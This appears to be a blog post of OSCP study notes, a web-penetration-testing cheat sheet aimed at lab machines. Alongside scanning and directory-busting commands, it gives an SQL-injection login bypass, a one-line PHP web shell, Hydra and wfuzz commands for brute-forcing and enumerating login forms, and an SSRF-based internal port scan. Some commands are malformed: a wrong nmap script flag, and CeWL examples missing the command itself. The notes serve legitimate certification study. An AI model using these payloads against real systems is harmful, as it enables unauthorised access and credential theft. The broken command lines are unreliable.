HTTP OSCP

  • Post author:
  • Post category:OSCP

Simple SQL Injection to try on login form

admin:’ OR ‘1’=’1

Using Nmap to scan for http exploits

sudo nmap –scripts=http-vul* -p 80 <IP Address>

nmap -Pn -sV -sC -vvvvv -p 80 192.168.1.1

Curl Grab service banner

curl -i [IP]

Read robot.txt good place to find directorys that user does not want to be searched by google

curl http://example.com/robots.txt

Using dirb to scan website directory for certain folders or files

dirb http://<IP Adddress>:PORT

dirb http://<IP address> -X .php,html,txt

Dirb http://<ip address> -r

# This is good options for website which you want ignore the SSL

gobuster dir -w /usr/share/seclists/Discovery/Web-Content/common.txt -u https://10.10.10.7 -k -x txt,php,html -t 40

gobuster dir -u http://jail.htb/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o gobuster.txt

gobuster dir -u shocker.htb/cgi-bin -w /usr/share/wordlists/dirb/common.txt -x cgi,sh,pl,py

gobuster dir -u http://10.10.10.73 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x aspx -t 30

WhatWeb

whatweb [IP]:[PORT] –color=never –log-brief=”[OUTPUT].txt”

Nikto

nikto -host=http://10.0.0.1

SSL Scan

sslscan $RHOST

#

python3 /opt/dirsearch/dirsearch.py -u http://10.10.10.9/ -e php -x 403,404 -t 50

Check WebDav

davtest -url http://10.10.10.14

# Using Hydra to brute force password for admin user

hydra 10.10.10.43 -l 0xdf -P /usr/share/seclists/Passwords/twitter-banned.txt https-post-form “/department/login.php:username=admin&password=^PASS^&proc_login=true:Incorrect password”

# wfuzz example of trying to find valid users

wfuzz -c -w /usr/share/seclists/Usernames/Names/names.txt –hs “No account found with that username.” -d “username=FUZZ&password=password” http://10.10.10.97/login.php

# wfuzz example of trying to find user password

wfuzz -c -w /usr/share/wordlists/rockyou.txt –hs “The password you entered was not valid.” -d “username=tyler&password=FUZZ” http://10.10.10.97/login.php

# Simple PHP shell

<?php echo system($_REQUEST[“ipp”]); ?>

#WFUZZ very good option to use instead of burp suite.

wfuzz -c -z range, 1-65535 http://10.10.10.55:60000/url.php?path=http://localhost:FUZZ

# Only show ports that are responding

wfuzz -c -z range,1-65535 –hl=2 http://10.10.10.55:60000/url.php?path=http://localhost:FUZZ

CeWL – CeWL creates customer wordlists based on a specific URL by crawling the web page and picking relevant words. This can be utilized to assist in bruteforcing web page logins.

Example Syntax:

If http:

http://[IP]:[PORT]/ -m 6, “http,https,ssl,soap,http-proxy,http-alt”

If https:

https://[IP]:[PORT]/ -m 6, “http,https,ssl,soap,http-proxy,http-alt”

wafw00f – Wafw00f identifies if a particular web address is behind a web application firewall.

Example Syntax:

If http:

wafw00f http://[IP]:[PORT], “http,https,ssl,soap,http-proxy,http-alt”

If https:

wafw00f https://[IP]:[PORT], “http,https,ssl,soap,http-proxy,http-alt”

Gobuster – Gobuster is a directory/file busting tool for websites written in Golang. This tool can be run multiple ways, but two main busting strategies are almost always used:

Utilize a wordlist of common files/directories.

Utilize a wordlist of common cgis.

Common Directory Busting Example Syntax:

If http:

gobuster -w /usr/share/wordlists/SecLists/Discovery/Web_Content/common.txt -u http://[IP]:[PORT] -s “200,204,301,307,403,500”

If https:

gobuster -w /usr/share/wordlists/SecLists/Discovery/Web_Content/common.txt -u https://[IP]:[PORT] -s “200,204,301,307,403,500”

Common CGI Busting Example Syntax:

If http:

gobuster -w /usr/share/wordlists/SecLists/Discovery/Web_Content/cgis.txt -u http://[IP]:[PORT] -s “200,204,301,307,403,500”

If https:

gobuster -w /usr/share/wordlists/SecLists/Discovery/Web_Content/cgis.txt -u https://[IP]:[PORT] -s “200,204,301,307,403,500”